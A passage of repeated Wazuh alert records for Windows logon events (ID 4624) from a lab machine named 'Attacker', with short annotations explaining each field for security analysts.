Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.439568 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:05.8916950Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43752 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.446906 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:08.0405533Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43755 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.454244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:09.1230899Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43757 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.461580 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:13.4677661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43759 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.468918 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3513724Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43763 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F1ED7
Linked Logon ID: 0x25F285D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
